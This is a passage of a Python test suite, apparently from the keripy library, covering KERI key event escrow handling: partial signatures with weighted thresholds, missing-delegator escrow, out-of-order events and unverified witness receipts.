        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == srdr.digb  # escrow entry for event

        # add another sig
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
        msg.extend(counter.qb64b)
        msg.extend(sigers[0].qb64b)
        # apply msg to Kevery to process
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        assert kvr.sn == 0  # key state not updated
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == srdr.digb  # escrow entry for event

        # get DTS set by escrow date time stamp on event
        edtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))

        # Process partials but now escrow not stale
        kvy.processEscrowPartialSigs()
        assert kvr.serder.dig == srdr.dig  # key state updated so event was validated
        assert kvr.sn == 1  # key state successfully updated
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 0  # escrow gone

        # get DTS set by first seen event acceptance date time stamp
        adtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
        # ensure accept time is later than escrow time, default timedelta is zero
        assert (helping.fromIso8601(adtsb) - helping.fromIso8601(edtsb)) > datetime.timedelta()

        # send duplicate message but add last sig
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
        msg.extend(counter.qb64b)
        msg.extend(sigers[2].qb64b)
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        sigs = kvy.db.getSigs(dbing.dgKey(pre, srdr.dig))  # but sigs is more
        assert len(sigs) == 3
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 0  # escrow stays gone
        # get DTS after partial last sig should not change dts from first accepted
        pdtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
        assert pdtsb == adtsb
        # get first seen
        fsdig = kvy.db.getFe(dbing.fnKey(pre, 1))
        assert fsdig == srdr.digb

        # Create rotation event
        # get current keys as verfers and next digests as digers
        sith = nxtsith  # rotate so nxtsith is now current sith and need new nextsith
        # 2 of first 3 and 1 of last 2
        nxtsith = [["1/2", "1/2", "1/2"],["1/1", "1/1"]]
        verfers, digers, cst, nst = mgr.rotate(pre=pre, count=5, sith=nxtsith, temp=True)
        assert nst == nxtsith
        srdr = eventing.rotate(pre=kvr.prefixer.qb64,
                               keys=[verfer.qb64 for verfer in verfers],
                               sith=sith,
                               dig=kvr.serder.diger.qb64,
                               nxt=coring.Nexter(sith=nxtsith,
                                                 digs=[diger.qb64 for diger in digers]).qb64,
                               sn=kvr.sn+1,
                               data=[])
        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
        # fully signed rotation: accepted directly without escrow
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)
        # apply msg to Kevery
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        assert kvr.serder.dig == srdr.dig  # key state updated so event was validated

        # Create rotation event
        # get current keys as verfers and next digests as digers
        sith = nxtsith  # rotate so nxtsith is now current sith and need new nextsith
        # 2 of first 3 and 1 of last 2
        nxtsith = [["1/2", "1/2", "1/2"],["1/1", "1/1"]]
        verfers, digers, cst, nst = mgr.rotate(pre=pre, count=5, sith=nxtsith, temp=True)
        assert cst == nst == nxtsith
        srdr = eventing.rotate(pre=kvr.prefixer.qb64,
                               keys=[verfer.qb64 for verfer in verfers],
                               sith=sith,
                               dig=kvr.serder.diger.qb64,
                               nxt=coring.Nexter(sith=nxtsith,
                                                 digs=[diger.qb64 for diger in digers]).qb64,
                               sn=kvr.sn+1,
                               data=[])
        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
        # attach sigs 0 and 3 only: insufficient for the nested weighted threshold
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs, count=2)
        msg.extend(counter.qb64b)
        msg.extend(sigers[0].qb64b)
        msg.extend(sigers[3].qb64b)
        # apply msg to Kevery
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        assert kvr.serder.diger.qb64 != srdr.dig  # key state not updated
        # process escrow
        kvy.processEscrowPartialSigs()
        assert kvr.serder.diger.qb64 != srdr.dig  # key state not updated

        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
        msg.extend(counter.qb64b)
        msg.extend(sigers[1].qb64b)
        # apply msg to Kevery
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        assert kvr.serder.diger.qb64 != srdr.dig  # key state not updated

        # get DTS set by escrow date time stamp on event
        edtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))

        # process escrow
        kvy.processEscrowPartialSigs()
        assert kvr.serder.diger.qb64 == srdr.dig  # key state updated

        # get DTS set by first seen event acceptance date time stamp
        adtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
        # ensure accept time is later than escrow time, default timedelta is zero
        assert (helping.fromIso8601(adtsb) - helping.fromIso8601(edtsb)) > datetime.timedelta()
        # get first seen
        fsdig = kvy.db.getFe(dbing.fnKey(pre, 3))
        assert fsdig == srdr.digb

    # temp=True databases are deleted on context exit
    assert not os.path.exists(ks.path)
    assert not os.path.exists(db.path)
    """End Test"""
def test_missing_delegator_escrow():
    """
    Test missing delegator escrow.

    A delegated inception event cannot be validated until its delegator's
    key event log (inception plus the delegating interaction with its seal)
    has been seen.  Verifies that the delegate's Kevery escrows the
    delegated event (partial-sig escrow plus partially-delegated entry,
    getPde) and only accepts it once Bob's inception and delegating
    interaction have been processed; then repeats with a delegated rotation.
    """
    # bob is the delegator del is bob's delegate
    bobSalt = coring.Salter(raw=b'0123456789abcdef').qb64
    delSalt = coring.Salter(raw=b'abcdef0123456789').qb64
    psr = parsing.Parser()
    with basing.openDB(name="bob") as bobDB, \
            keeping.openKS(name="bob") as bobKS, \
            basing.openDB(name="del") as delDB, \
            keeping.openKS(name="del") as delKS:
        # Init key pair managers
        bobMgr = keeping.Manager(keeper=bobKS, salt=bobSalt)
        delMgr = keeping.Manager(keeper=delKS, salt=delSalt)

        # Init Keverys
        bobKvy = eventing.Kevery(db=bobDB)
        delKvy = eventing.Kevery(db=delDB)

        # Setup Bob by creating inception event
        verfers, digers, cst, nst = bobMgr.incept(stem='bob', temp=True)  # algo default salty and rooted
        bobSrdr = eventing.incept(keys=[verfer.qb64 for verfer in verfers],
                                  nxt=coring.Nexter(digs=[diger.qb64 for diger in digers]).qb64,
                                  code=coring.MtrDex.Blake3_256)
        bobPre = bobSrdr.ked["i"]
        bobMgr.move(old=verfers[0].qb64, new=bobPre)  # move key pair label to prefix
        sigers = bobMgr.sign(ser=bobSrdr.raw, verfers=verfers)
        msg = bytearray(bobSrdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)
        bobIcpMsg = msg  # save for later

        # apply msg to bob's Kevery
        psr.parse(ims=bytearray(msg), kvy=bobKvy)
        # bobKvy.process(ims=bytearray(msg))  # process local copy of msg
        bobK = bobKvy.kevers[bobPre]
        assert bobK.prefixer.qb64 == bobPre
        assert bobK.serder.diger.qb64 == bobSrdr.dig

        # Setup Del's inception event assuming that Bob's next event will be an ixn delegating event
        verfers, digers, cst, nst = delMgr.incept(stem='del', temp=True)  # algo default salty and rooted
        # NOTE(review): seal is rebound below before use; this SealLocation
        # appears unused here — confirm against keripy upstream
        seal = eventing.SealLocation(i=bobK.prefixer.qb64,
                                     s="{:x}".format(bobK.sn+1),
                                     t=coring.Ilks.ixn,
                                     p=bobK.serder.diger.qb64)
        delSrdr = eventing.delcept(keys=[verfer.qb64 for verfer in verfers],
                                   delpre=bobPre,
                                   nxt=coring.Nexter(digs=[diger.qb64 for diger in digers]).qb64)
        delPre = delSrdr.ked["i"]
        delMgr.move(old=verfers[0].qb64, new=delPre)  # move key pair label to prefix

        # Now create delegating event
        seal = eventing.SealEvent(i=delPre,
                                  s=delSrdr.ked["s"],
                                  d=delSrdr.dig)
        bobSrdr = eventing.interact(pre=bobK.prefixer.qb64,
                                    dig=bobK.serder.diger.qb64,
                                    sn=bobK.sn+1,
                                    data=[seal._asdict()])
        sigers = bobMgr.sign(ser=bobSrdr.raw, verfers=bobK.verfers)
        msg = bytearray(bobSrdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)
        bobIxnMsg = msg

        # apply msg to bob's Kevery
        psr.parse(ims=bytearray(msg), kvy=bobKvy)
        # bobKvy.process(ims=bytearray(msg))  # process local copy of msg
        assert bobK.serder.dig == bobSrdr.dig  # key state updated so event was validated

        # now create msg with Del's delegated inception event
        sigers = delMgr.sign(ser=delSrdr.raw, verfers=verfers)
        msg = bytearray(delSrdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)
        # attach seal source couple (sn + digest of delegating event)
        counter = coring.Counter(code=coring.CtrDex.SealSourceCouples,
                                 count=1)
        msg.extend(counter.qb64b)
        seqner = coring.Seqner(sn=bobK.sn)
        msg.extend(seqner.qb64b)
        msg.extend(bobSrdr.digb)

        # apply Del's delegated inception event message to bob's Kevery
        psr.parse(ims=bytearray(msg), kvy=bobKvy)
        # bobKvy.process(ims=bytearray(msg))  # process local copy of msg
        assert delPre in bobKvy.kevers  # successfully validated
        bobDelK = bobKvy.kevers[delPre]  # delK in bobs kevery
        assert bobDelK.delegated
        assert bobDelK.serder.diger.qb64 == delSrdr.dig  # key state updated so event was validated
        couple = bobKvy.db.getAes(dbing.dgKey(delPre, delSrdr.dig))
        assert couple == seqner.qb64b + bobSrdr.digb

        # apply Del's inception msg to Del's Kevery
        # Dels event will fail but will add to its escrow
        psr.parse(ims=bytearray(msg), kvy=delKvy)
        # delKvy.process(ims=bytearray(msg))  # process remote copy of msg
        assert delPre not in delKvy.kevers
        assert bobPre not in delKvy.kevers
        escrows = delKvy.db.getPses(dbing.snKey(delPre, int(delSrdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == delSrdr.digb  # escrow entry for event
        escrow = delKvy.db.getPde(dbing.dgKey(delPre, delSrdr.dig))
        assert escrow == seqner.qb64b + bobSrdr.digb  # escrow entry for event

        # verify Kevery process partials escrow is idempotent to previously escrowed events
        # assuming not stale but nothing else has changed
        delKvy.processEscrowPartialSigs()
        assert delPre not in delKvy.kevers
        assert bobPre not in delKvy.kevers
        escrows = delKvy.db.getPses(dbing.snKey(delPre, int(delSrdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == delSrdr.digb  # escrow entry for event
        escrow = delKvy.db.getPde(dbing.dgKey(delPre, delSrdr.dig))
        assert escrow == seqner.qb64b + bobSrdr.digb  # escrow entry for event

        # apply Bob's inception to Dels' Kvy
        psr.parse(ims=bytearray(bobIcpMsg), kvy=delKvy)
        # delKvy.process(ims=bytearray(bobIcpMsg))  # process remote copy of msg
        assert bobPre in delKvy.kevers  # message accepted
        delKvy.processEscrowPartialSigs()  # process escrow
        # still missing the delegating interaction, so stays escrowed
        assert delPre not in delKvy.kevers
        escrows = delKvy.db.getPses(dbing.snKey(delPre, int(delSrdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == delSrdr.digb  # escrow entry for event
        escrow = delKvy.db.getPde(dbing.dgKey(delPre, delSrdr.dig))
        assert escrow == seqner.qb64b + bobSrdr.digb  # escrow entry for event

        # apply Bob's delegating interaction to Dels' Kvy
        psr.parse(ims=bytearray(bobIxnMsg), kvy=delKvy)
        # delKvy.process(ims=bytearray(bobIxnMsg))  # process remote copy of msg
        delKvy.processEscrowPartialSigs()  # process escrows
        assert delPre in delKvy.kevers  # event removed from escrow
        delK = delKvy.kevers[delPre]
        assert delK.delegated
        assert delK.serder.diger.qb64 == delSrdr.dig
        couple = delKvy.db.getAes(dbing.dgKey(delPre, delSrdr.dig))
        assert couple == seqner.qb64b + bobSrdr.digb
        escrows = delKvy.db.getPses(dbing.snKey(delPre, int(delSrdr.ked["s"], 16)))
        assert len(escrows) == 0
        escrow = delKvy.db.getPde(dbing.dgKey(delPre, delSrdr.dig))
        assert escrow is None

        # Setup Del rotation event
        verfers, digers, cst, nst = delMgr.rotate(pre=delPre, temp=True)
        delSrdr = eventing.deltate(pre=bobDelK.prefixer.qb64,
                                   keys=[verfer.qb64 for verfer in verfers],
                                   dig=bobDelK.serder.diger.qb64,
                                   sn=bobDelK.sn+1,
                                   nxt=coring.Nexter(digs=[diger.qb64 for diger in digers]).qb64)

        # Now create delegating interaction event
        seal = eventing.SealEvent(i=bobDelK.prefixer.qb64,
                                  s=delSrdr.ked["s"],
                                  d=delSrdr.dig)
        bobSrdr = eventing.interact(pre=bobK.prefixer.qb64,
                                    dig=bobK.serder.diger.qb64,
                                    sn=bobK.sn+1,
                                    data=[seal._asdict()])
        sigers = bobMgr.sign(ser=bobSrdr.raw, verfers=bobK.verfers)
        msg = bytearray(bobSrdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)

        # apply msg to bob's Kevery
        psr.parse(ims=bytearray(msg), kvy=bobKvy)
        # bobKvy.process(ims=bytearray(msg))  # process local copy of msg
        assert bobK.serder.diger.qb64 == bobSrdr.dig  # key state updated so event was validated

        # apply msg to del's Kevery
        psr.parse(ims=bytearray(msg), kvy=delKvy)
        # delKvy.process(ims=bytearray(msg))  # process remote copy of msg
        assert delKvy.kevers[bobPre].serder.diger.qb64 == bobSrdr.dig

        # now create msg from Del's delegated rotation event
        sigers = delMgr.sign(ser=delSrdr.raw, verfers=verfers)
        msg = bytearray(delSrdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)
        counter = coring.Counter(code=coring.CtrDex.SealSourceCouples,
                                 count=1)
        msg.extend(counter.qb64b)
        seqner = coring.Seqner(sn=bobK.sn)
        msg.extend(seqner.qb64b)
        msg.extend(bobSrdr.digb)

        # apply Del's delegated Rotation event message to del's Kevery
        psr.parse(ims=bytearray(msg), kvy=delKvy)
        # delKvy.process(ims=bytearray(msg))  # process remote copy of msg
        assert delK.delegated
        assert delK.serder.diger.qb64 == delSrdr.dig
        couple = delKvy.db.getAes(dbing.dgKey(delPre, delSrdr.dig))
        assert couple == seqner.qb64b + bobSrdr.digb

        # apply Del's delegated Rotation event message to bob's Kevery
        psr.parse(ims=bytearray(msg), kvy=bobKvy)
        # bobKvy.process(ims=bytearray(msg))  # process local copy of msg
        assert bobDelK.delegated
        assert bobDelK.serder.diger.qb64 == delSrdr.dig  # key state updated so event was validated
        couple = bobKvy.db.getAes(dbing.dgKey(delPre, delSrdr.dig))
        assert couple == seqner.qb64b + bobSrdr.digb

    # temp=True databases are deleted on context exit
    assert not os.path.exists(delKS.path)
    assert not os.path.exists(delDB.path)
    assert not os.path.exists(bobKS.path)
    assert not os.path.exists(bobDB.path)
    """End Test"""
def test_out_of_order_escrow():
    """
    Test out of order escrow.

    Events that arrive before their predecessors (rotation sn=2 and
    interaction sn=1 before the inception sn=0) are held in the
    out-of-order escrow (getOoes).  Verifies escrow processing is
    idempotent, that a zero TimeoutOOE purges stale entries, and that once
    the inception arrives the escrowed events are replayed in order and
    key state advances to the rotation.
    """
    salt = coring.Salter(raw=b'0123456789abcdef').qb64  # init wes Salter
    psr = parsing.Parser()
    # init event DB and keep DB
    with basing.openDB(name="edy") as db, keeping.openKS(name="edy") as ks:
        # Init key pair manager
        mgr = keeping.Manager(keeper=ks, salt=salt)
        # Init Kevery with event DB
        kvy = eventing.Kevery(db=db)

        # create inception event with 3 keys each in incept and next sets
        # defaults are algo salty and rooted
        sith = ["1/2", "1/2", "1/2"]  # 2 of 3 but with weighted threshold
        nxtsith = ["1/2", "1/2", "1/2"]
        verfers, digers, cst, nst = mgr.incept(icount=3, isith=sith,
                                               ncount=3, nsith=nxtsith,
                                               stem='wes', temp=True)
        assert cst == nst == sith
        srdr = eventing.incept(keys=[verfer.qb64 for verfer in verfers],
                               sith=sith,
                               nxt=coring.Nexter(sith=nxtsith,
                                                 digs=[diger.qb64 for diger in digers]).qb64,
                               code=coring.MtrDex.Blake3_256)
        pre = srdr.ked["i"]
        icpdig = srdr.dig
        mgr.move(old=verfers[0].qb64, new=pre)  # move key pair label to prefix
        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)
        icpmsg = bytearray(msg)  # save copy for later

        # create interaction event
        srdr = eventing.interact(pre=pre, dig=icpdig, sn=1, data=[])
        ixndig = srdr.dig
        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)
        ixnmsg = bytearray(msg)  # save copy for later

        # Create rotation event
        # get current keys as verfers and next digests as digers
        sith = nxtsith  # rotate so nxtsith is now current sith and need new nextsith
        # 2 of first 3 and 1 of last 2
        nxtsith = [["1/2", "1/2", "1/2"],["1/1", "1/1"]]
        verfers, digers, cst, nst = mgr.rotate(pre=pre, count=5, sith=nxtsith, temp=True)
        assert cst == sith
        assert nst == nxtsith
        srdr = eventing.rotate(pre=pre,
                               keys=[verfer.qb64 for verfer in verfers],
                               sith=sith,
                               dig=ixndig,
                               nxt=coring.Nexter(sith=nxtsith,
                                                 digs=[diger.qb64 for diger in digers]).qb64,
                               sn=2,
                               data=[])
        rotdig = srdr.dig
        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)
        rotmsg = bytearray(msg)  # save copy for later

        # apply rotation msg to Kevery to process (out of order: sn=2 first)
        psr.parse(ims=bytearray(rotmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rotmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
        assert len(escrows) == 1
        assert escrows[0] == rotdig.encode("utf-8")  # escrow entry for event

        # verify Kevery process is idempotent to previously escrowed events
        psr.parse(ims=bytearray(rotmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rotmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
        assert len(escrows) == 1
        assert escrows[0] == rotdig.encode("utf-8")  # escrow entry for event

        # verify Kevery process out of order escrow is idempotent to previously escrowed events
        # assuming not stale but nothing else has changed
        kvy.processEscrowOutOfOrders()
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
        assert len(escrows) == 1
        assert escrows[0] == rotdig.encode("utf-8")  # escrow entry for event

        # apply ixn msg to Kevery to process (still out of order: sn=1)
        psr.parse(ims=bytearray(ixnmsg), kvy=kvy)
        # kvy.process(ims=bytearray(ixnmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
        assert len(escrows) == 1
        assert escrows[0] == ixndig.encode("utf-8")  # escrow entry for event

        # verify Kevery process is idempotent to previously escrowed events
        psr.parse(ims=bytearray(ixnmsg), kvy=kvy)
        # kvy.process(ims=bytearray(ixnmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
        assert len(escrows) == 1
        assert escrows[0] == ixndig.encode("utf-8")  # escrow entry for event

        # verify Kevery process out of order escrow is idempotent to previously escrowed events
        # assuming not stale but nothing else has changed
        kvy.processEscrowOutOfOrders()
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
        assert len(escrows) == 1
        assert escrows[0] == ixndig.encode("utf-8")  # escrow entry for event

        # Process partials but stale escrow set Timeout to 0
        kvy.TimeoutOOE = 0  # forces all escrows to be stale
        time.sleep(0.001)
        kvy.processEscrowOutOfOrders()
        assert pre not in kvy.kevers  # key state not updated
        escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
        assert len(escrows) == 0  # escrow gone
        escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
        assert len(escrows) == 0

        # Now reset timeout so not zero and rsend events to reload escrow
        kvy.TimeoutOOE = 3600

        # re-apply rotation msg to Kevery to process
        psr.parse(ims=bytearray(rotmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rotmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
        assert len(escrows) == 1
        assert escrows[0] == rotdig.encode("utf-8")  # escrow entry for event

        # re-apply ixn msg to Kevery to process
        psr.parse(ims=bytearray(ixnmsg), kvy=kvy)
        # kvy.process(ims=bytearray(ixnmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
        assert len(escrows) == 1
        assert escrows[0] == ixndig.encode("utf-8")  # escrow entry for event

        # re-apply inception msg to Kevery to process
        psr.parse(ims=bytearray(icpmsg), kvy=kvy)
        # kvy.process(ims=bytearray(icpmsg))  # process local copy of msg
        assert pre in kvy.kevers  # event accepted
        kvr = kvy.kevers[pre]
        assert kvr.serder.dig == icpdig  # key state updated so event was validated
        assert kvr.sn == 0  # key state successfully updated
        # verify escrows not changed
        escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
        assert len(escrows) == 1
        assert escrows[0] == rotdig.encode("utf-8")  # escrow entry for event
        escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
        assert len(escrows) == 1
        assert escrows[0] == ixndig.encode("utf-8")  # escrow entry for event

        # Process out of order escrow
        # assuming not stale but nothing else has changed
        kvy.processEscrowOutOfOrders()
        assert kvr.serder.dig == rotdig  # key state updated so event was validated
        assert kvr.sn == 2  # key state successfully updated
        escrows = kvy.db.getOoes(dbing.snKey(pre, 1))
        assert len(escrows) == 0  # escrow gone
        escrows = kvy.db.getOoes(dbing.snKey(pre, 2))
        assert len(escrows) == 0

    # temp=True databases are deleted on context exit
    assert not os.path.exists(ks.path)
    assert not os.path.exists(db.path)
    """End Test"""
def test_unverified_receipt_escrow():
    """
    Test Kevery escrow of unverified nontransferable (witness) receipts.

    Scenario exercised below:
      1. Witness receipts for icp/ixn/rot events arrive BEFORE the events
         themselves, so each receipt couple lands in the Ure (unverified
         receipt) escrow keyed by (pre, sn).
      2. Setting TimeoutURE to 0 marks every escrow entry stale, so
         processEscrowUnverNonTrans() purges them all.
      3. After restoring TimeoutURE and re-sending the receipts, the key
         events are delivered; the escrowed receipts then verify and are
         promoted into the Rcts (verified receipt couple) database.
    """
    salt = coring.Salter(raw=b'0123456789abcdef').qb64  # init Salter
    psr = parsing.Parser()

    # init event DB and keep DB
    with basing.openDB(name="edy") as db, keeping.openKS(name="edy") as ks:
        # Init key pair manager
        mgr = keeping.Manager(keeper=ks, salt=salt)
        # Init Kevery with event DB
        kvy = eventing.Kevery(db=db)

        # create witness identifiers (nontransferable, single key each)
        verfers, digers, cst, nst = mgr.incept(ncount=0, stem="wit0",
                                               transferable=False, temp=True)
        wit0Verfer = verfers[0]
        wit0pre = wit0Verfer.qb64

        verfers, digers, cst, nst = mgr.incept(ncount=0, stem="wit1",
                                               transferable=False, temp=True)
        wit1Verfer = verfers[0]
        wit1pre = wit1Verfer.qb64

        assert wit1pre != wit0pre

        # create inception event with 3 keys each in incept and next sets
        # defaults are algo salty and rooted
        sith = ["1/2", "1/2", "1/2"]  # 2 of 3 but with weighted threshold
        nxtsith = ["1/2", "1/2", "1/2"]
        verfers, digers, cst, nst = mgr.incept(icount=3, isith=sith,
                                               ncount=3, nsith=nxtsith,
                                               stem='edy', temp=True)
        assert cst == nst == sith

        srdr = eventing.incept(keys=[verfer.qb64 for verfer in verfers],
                               sith=sith,
                               nxt=coring.Nexter(sith=nxtsith,
                                                 digs=[diger.qb64 for diger in digers]).qb64,
                               code=coring.MtrDex.Blake3_256)

        pre = srdr.ked["i"]
        icpdig = srdr.dig

        mgr.move(old=verfers[0].qb64, new=pre)  # move key pair label to prefix

        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)

        # assemble icp msg = serialized event + indexed controller sigs
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)

        icpmsg = msg

        # create receipt(s) of inception message
        reserder = eventing.receipt(pre=pre, sn=0, dig=srdr.dig)
        # sign event not receipt with wit0
        wit0Cigar = mgr.sign(ser=srdr.raw, verfers=[wit0Verfer], indexed=False)[0]  # returns Cigar unindexed
        wit1Cigar = mgr.sign(ser=srdr.raw, verfers=[wit1Verfer], indexed=False)[0]  # returns Cigar unindexed
        recnt = coring.Counter(code=coring.CtrDex.NonTransReceiptCouples, count=2)

        # receipt msg = receipt serder + (witness prefix, cigar) couples
        msg = bytearray()
        msg.extend(reserder.raw)
        msg.extend(recnt.qb64b)
        msg.extend(wit0pre.encode("utf-8"))
        msg.extend(wit0Cigar.qb64b)
        msg.extend(wit1pre.encode("utf-8"))
        msg.extend(wit1Cigar.qb64b)

        rcticpmsg = msg

        # Process receipt by kvy before its event arrives -> Ure escrow
        psr.parse(ims=bytearray(rcticpmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rcticpmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # no events yet for pre
        escrows = kvy.db.getUres(dbing.snKey(pre, 0))  # so escrowed receipts
        assert len(escrows) == 2
        diger, prefixer, cigar = eventing.deReceiptTriple(escrows[0])
        assert diger.qb64 == srdr.dig
        assert prefixer.qb64 == wit0pre
        assert cigar.qb64 == wit0Cigar.qb64
        diger, prefixer, cigar = eventing.deReceiptTriple(escrows[1])
        assert diger.qb64 == srdr.dig
        assert prefixer.qb64 == wit1pre
        assert cigar.qb64 == wit1Cigar.qb64

        # create interaction event
        srdr = eventing.interact(pre=pre, dig=icpdig, sn=1, data=[])
        ixndig = srdr.dig
        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)

        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)

        ixnmsg = msg

        # create receipt(s) of interaction message
        reserder = eventing.receipt(pre=pre, sn=1, dig=srdr.dig)
        # sign event not receipt with wit0
        wit0Cigar = mgr.sign(ser=srdr.raw, verfers=[wit0Verfer], indexed=False)[0]  # returns Cigar unindexed
        wit1Cigar = mgr.sign(ser=srdr.raw, verfers=[wit1Verfer], indexed=False)[0]  # returns Cigar unindexed
        recnt = coring.Counter(code=coring.CtrDex.NonTransReceiptCouples, count=2)

        msg = bytearray()
        msg.extend(reserder.raw)
        msg.extend(recnt.qb64b)
        msg.extend(wit0pre.encode("utf-8"))
        msg.extend(wit0Cigar.qb64b)
        msg.extend(wit1pre.encode("utf-8"))
        msg.extend(wit1Cigar.qb64b)

        rctixnmsg = msg

        # Process receipt by kvy; still no event so escrow at sn=1
        psr.parse(ims=bytearray(rctixnmsg), kvy=kvy)
        # kvy.process(ims=bytearray(rctixnmsg))  # process local copy of msg
        assert pre not in kvy.kevers  # no events yet for pre
        escrows = kvy.db.getUres(dbing.snKey(pre, 1))  # so escrowed receipts
        assert len(escrows) == 2
        diger, prefixer, cigar = eventing.deReceiptTriple(escrows[0])
        assert diger.qb64 == srdr.dig
        assert prefixer.qb64 == wit0pre
        assert cigar.qb64 == wit0Cigar.qb64
        diger, prefixer, cigar = eventing.deReceiptTriple(escrows[1])
        assert diger.qb64 == srdr.dig
        assert prefixer.qb64 == wit1pre
        assert cigar.qb64 == wit1Cigar.qb64

        # Create rotation event
        # get current keys as verfers and next digests as digers
        verfers, digers, cst, nst = mgr.rotate(pre=pre, count=5, temp=True)
        sith = nxtsith  # rotate so nxtsith is now current sith and need new nextsith
        # 2 of first 3 and 1 of last 2
        nxtsith = [["1/2", "1/2", "1/2"], ["1/1", "1/1"]]
        srdr = eventing.rotate(pre=pre,
                               keys=[verfer.qb64 for verfer in verfers],
                               sith=sith,
                               dig=ixndig,
                               nxt=coring.Nexter(sith=nxtsith,
                                                 digs=[diger.qb64 for diger in digers]).qb64,
                               sn=2,
                               data=[])
        rotdig = srdr.dig
        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)

        msg = bytearray(srdr.raw)
